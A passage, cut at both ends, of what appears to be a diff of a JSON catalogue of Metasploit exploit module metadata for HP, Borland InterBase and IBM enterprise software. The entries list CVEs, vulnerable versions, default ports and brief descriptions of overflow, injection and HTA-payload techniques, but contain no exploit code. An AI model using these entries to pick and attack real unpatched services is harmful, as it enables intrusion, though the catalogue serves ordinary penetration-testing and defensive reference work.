overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in a\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search a non corrupted copy of the payload in the heap. On the other\n hand the overflowed buffer is stored in a frame protected by stack cookies, because of\n this SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.", - "references": [ - "CVE-2012-0124", - "OSVDB-80105", - "BID-52431", - "URL-https://www.rapid7.com/blog/post/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124" - ], - "platform": "Windows", - "arch": "", - "rport": 3817, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", - "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_new_folder", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_dataprotector_traversal": { - "name": "HP Data Protector Backup Client Service Directory Traversal", - "fullname": "exploit/windows/misc/hp_dataprotector_traversal", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-01-02", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.", - "references": [ - "CVE-2013-6194", - "OSVDB-101630", - "BID-64647", - "ZDI-14-003", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.20 build 370 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": { - "name": "HPE iMC dbman RestartDB Unauthenticated RCE", - "fullname": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "sztivi", - "Chris Lyne", - "bcoles " - ], - "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", - "references": [ - "CVE-2017-5816", - "EDB-43198", - "ZDI-17-340", - "BID-98469", - "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" - ], - "platform": "Windows", - "arch": "", - "rport": 2810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": { - "name": "HPE iMC dbman RestoreDBase Unauthenticated RCE", - "fullname": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "sztivi", - "Chris Lyne", - "bcoles " - ], - "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", - "references": [ - "CVE-2017-5817", - "EDB-43195", - "ZDI-17-341", - "BID-98469", - "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" - ], - "platform": "Windows", - "arch": "", - "rport": 2810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_imc_uam": { - "name": "HP Intelligent Management Center UAM Buffer Overflow", - "fullname": "exploit/windows/misc/hp_imc_uam", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-29", - "type": "exploit", - "author": [ - "e6af8de8b1d4b2b6d5ba2610cbf9cd38", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2012-3274", - "OSVDB-85060", - "BID-55271", - "ZDI-12-171", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863" - ], - "platform": "Windows", - "arch": "", - "rport": 1811, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_uam.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_uam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_loadrunner_magentproc": { - "name": "HP LoadRunner magentproc.exe Overflow", - "fullname": "exploit/windows/misc/hp_loadrunner_magentproc", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-27", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2013-4800", - "OSVDB-95644", - "ZDI-13-169" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / HP LoadRunner 11.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_loadrunner_magentproc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": { - "name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", - "fullname": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-05-06", - "type": "exploit", - "author": [ - "Unknown", - "aushack " - ], - "description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).", - "references": [ - "CVE-2010-1549", - "ZDI-10-080", - "BID-39965", - "URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968" - ], - "platform": "Windows", - "arch": "", - "rport": 54345, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows (Dropper)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_magentservice": { - "name": "HP Diagnostics Server magentservice.exe Overflow", - "fullname": "exploit/windows/misc/hp_magentservice", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-01-12", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "hal" - ], - "description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.", - "references": [ - "OSVDB-72815", - "CVE-2011-4789", - "ZDI-12-016" - ], - "platform": "Windows", - "arch": "", - "rport": 23472, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Diagnostics Server 9.10" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_magentservice.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_magentservice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_1": { - "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_1", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-17", - "type": "exploit", - "author": [ - "EgiX ", - "Fairuzan Roslan ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.", - "references": [ - "CVE-2007-2280", - "BID-37396", - "OSVDB-61206", - "ZDI-09-099" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", - "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", - "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", - "HP Application Recovery Manager software A.06.10: INET, internal build 282" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_1.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_1", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_2": { - "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_2", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-17", - "type": "exploit", - "author": [ - "EgiX ", - "Fairuzan Roslan ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the second one.", - "references": [ - "CVE-2009-3844", - "BID-37250", - "OSVDB-60852", - "ZDI-09-091" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", - "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", - "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", - "HP Application Recovery Manager software A.06.10: INET, internal build 282" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_2.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_2", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_3": { - "name": "HP OmniInet.exe Opcode 27 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_3", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-06-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2011-1865", - "OSVDB-73571", - "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_3.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_3", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_4": { - "name": "HP OmniInet.exe Opcode 20 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_4", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-06-29", - "type": "exploit", - "author": [ - "Oren Isacson", - "muts", - "dookie", - "sinn3r ", - "corelanc0d3r " - ], - "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.", - "references": [ - "CVE-2011-1865", - "OSVDB-73571", - "EDB-17468", - "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_4.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_4", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_operations_agent_coda_34": { - "name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_operations_agent_coda_34", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", - "references": [ - "CVE-2012-2019", - "OSVDB-83673", - "BID-54362", - "ZDI-12-114" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Operations Agent 11.00 / Windows XP SP3", - "HP Operations Agent 11.00 / Windows 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_operations_agent_coda_34", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_operations_agent_coda_8c": { - "name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow", - "fullname": "exploit/windows/misc/hp_operations_agent_coda_8c", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", - "references": [ - "CVE-2012-2020", - "OSVDB-83674", - "BID-54362", - "ZDI-12-115" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Operations Agent 11.00 / Windows XP SP3", - "HP Operations Agent 11.00 / Windows 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_operations_agent_coda_8c", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_ovtrace": { - "name": "HP OpenView Operations OVTrace Buffer Overflow", - "fullname": "exploit/windows/misc/hp_ovtrace", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-08-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-3872", - "OSVDB-39527", - "BID-25255" - ], - "platform": "Windows", - "arch": "", - "rport": 5051, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Advanced Server All English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_ovtrace.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_ovtrace", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hta_server": { - "name": "HTA Web Server", - "fullname": "exploit/windows/misc/hta_server", - "aliases": [], - "rank": 0, - "disclosure_date": "2016-10-06", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.", - "references": [ - "URL-https://www.trustedsec.com/july-2015/malicious-htas/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Powershell x86", - "Powershell x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hta_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/hta_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "screen-effects" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_isc_attach_database": { - "name": "Borland InterBase isc_attach_database() Buffer Overflow", - "fullname": "exploit/windows/misc/ib_isc_attach_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38607", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_isc_attach_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_isc_create_database": { - "name": "Borland InterBase isc_create_database() Buffer Overflow", - "fullname": "exploit/windows/misc/ib_isc_create_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38606", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_isc_create_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_isc_create_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_svc_attach": { - "name": "Borland InterBase SVC_attach() Buffer Overflow", - "fullname": "exploit/windows/misc/ib_svc_attach", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38605", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_svc_attach.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_svc_attach", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_cognos_tm1admsd_bof": { - "name": "IBM Cognos tm1admsd.exe Overflow", - "fullname": "exploit/windows/misc/ibm_cognos_tm1admsd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.", - "references": [ - "CVE-2012-0202", - "OSVDB-80876", - "BID-52847", - "ZDI-12-101", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314" - ], - "platform": "Windows", - "arch": "", - "rport": 5498, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Cognos Express 9.5 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_cognos_tm1admsd_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_director_cim_dllinject": { - "name": "IBM System Director Agent DLL Injection", - "fullname": "exploit/windows/misc/ibm_director_cim_dllinject", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-03-10", - "type": "exploit", - "author": [ - "Bernhard Mueller", - "kingcope", - "juan vazquez " - ], - "description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.", - "references": [ - "CVE-2009-0880", - "OSVDB-52616", - "OSVDB-88102", - "BID-34065", - "URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt", - "URL-https://seclists.org/bugtraq/2012/Dec/5" - ], - "platform": "Windows", - "arch": "", - "rport": 6988, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" - ], - "mod_time": "2018-09-15 18:54:45 +0000", - "path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_director_cim_dllinject", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_tsm_cad_ping": { - "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", - "fullname": "exploit/windows/misc/ibm_tsm_cad_ping", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. This service does not restart.", - "references": [ - "CVE-2009-3853", - "OSVDB-59632" - ], - "platform": "Windows", - "arch": "", - "rport": 1582, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager Express 5.3.6.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_tsm_cad_ping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_tsm_rca_dicugetidentify": { - "name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow", - "fullname": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. This service does not restart.", - "references": [ - "CVE-2008-4828", - "OSVDB-54232", - "BID-34803" - ], - "platform": "Windows", - "arch": "", - "rport": 1582, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager 